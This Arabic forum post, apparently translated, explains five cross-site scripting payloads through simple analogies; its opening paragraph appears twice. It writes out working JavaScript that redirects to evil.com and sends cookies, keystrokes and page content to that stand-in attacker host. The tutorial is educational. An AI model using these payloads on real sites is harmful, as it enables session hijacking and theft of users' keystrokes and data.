السلام عليكم ورحمة الله وبركاته
تنويه: هذا المقال تم ترجمته
Cross-Site Scripting (XSS) هي مشكلة أمان في المواقع الإلكترونية، حيث يمكن لل Attackers وضع رسائل خبيثة على المواقع التي يس الآخرون. تُسمى هذه الرسائل "الحمولات" (Payloads)، ويمكن أن تسبب أشياء سيئة. دعونا نلقي نظرة على بعض الأمثلة ونشرحها بطريقة بسيطة.
تنويه: هذا المقال تم ترجمته
Cross-Site Scripting (XSS) هي مشكلة أمان في المواقع الإلكترونية، حيث يمكن لل Attackers وضع رسائل خبيثة على المواقع التي يس الآخرون. تُسمى هذه الرسائل "الحمولات" (Payloads)، ويمكن أن تسبب أشياء سيئة. دعونا نلقي نظرة على بعض الأمثلة ونشرحها بطريقة بسيطة.
1. صندوق التنبيه (Alert Box)
الحمولة:
JavaScript:
<script>alert('XSS');</script>
الشرح المبسط:<script>: مثل فتح ورقة سرية.
alert('XSS'): مثل كتابة "لقد أمسكنا بك!" على الورقة.
</script>: مثل إغلاق الورقة السرية.
ما يحدث في هذا الكود:عندما يرى أحدهم هذه الورقة، تظهر رسالة منبثقة تقول "لقد أمسكنا بك!"
2. إعادة التوجيه (Redirect)
الحمولة (Payload )
JavaScript:
<script>window.location='http://evil.com';</script><script>: مثل فتح ورقة سرية.
window.location='http://evil.com': مثل كتابة "اذهب إلى المنزل الذي يوجد فيه فخ" على الورقة.
</script>: مثل إغلاق الورقة السرية.
ما يحدث في هذا الكود:عندما يرى أحدهم هذه الورقة او التنبيه ، يتم إرساله إلى "المنزل الذي يوجد فيه الفخ بشكل مباشر" بدلًا من المكان الذي يريد الذهاب إليه.
3. سرقة الكوكيز (Cookie Theft)
الحمولة (Payload):
JavaScript:
<script>
var img = new Image();
img.src = "http://evil.com/stealcookie?cookie=" + document.cookie;
</script><script>: مثل فتح ورقة سرية.
var img = new Image(): مثل رسم صورة لأنبوب.
img.src = "http://evil.com/stealcookie?cookie=" + document.cookie:
img.src: مثل إخبار الأنبوب او القناة بمكان إرسال الكوكيز.
document.cookie: مثل أخذ الكوكيز من صندوق السيارة .
</script>: مثل إغلاق الورقة السرية.
ما يحدث في هذا الكود:عندما يرى أحدهم هذه الورقة، يتم إرسال الكوكيز الخاصة به من خلال الأنبوب إلى الattacker .
4. تسجيل ضغطات المفاتيح (Keylogger)
الحمولة:
JavaScript:
<script>
document.onkeypress = function(e) {
fetch('http://evil.com/log?key=' + e.key);
};
</script><script>: مثل فتح ورقة سرية.
document.onkeypress = function(e): مثل وضع فخ لالتقاط كل مفتاح تضغط عليه.
fetch('http://evil.com/log?key=' + e.key): مثل إرسال كل مفتاح تضغط عليه إلى الشخص الAttacker.
</script>: مثل إغلاق الورقة السرية.
ما يحدث في هذا الكود:عندما يرى أحدهم هذه الورقة، يتم إرسال كل ضغطة مفتاح إلى الشخص الAttacker.
5. سرقة محتوى الصفحة (Stealing Page Content)
الحمولة (Payload):
JavaScript:
<script>
var content = document.body.innerHTML;
fetch('http://evil.com/stealcontent?content=' + encodeURIComponent(content));
</script><script>: مثل فتح ورقة سرية.
var content = document.body.innerHTML:
var content: مثل أخذ صورة.
document.body.innerHTML: مثل تصوير كل شيء في الغرفة.
fetch('http://evil.com/stealcontent?content=' + encodeURIComponent(content)):
fetch: مثل إرسال رسالة.
'http://evil.com/stealcontent?content=' + encodeURIComponent(content): مثل إرسال الصورة إلى الشخص ال attacker.
</script>: مثل إغلاق الورقة السرية.
ما يحدث في هذا الكود:عندما يرى أحدهم هذه الورقة، يتم إرسال صورة لكل شيء موجود على الصفحة إلى الشخص الغلط او السيئ.
المصدر:
التعديل الأخير بواسطة المشرف:
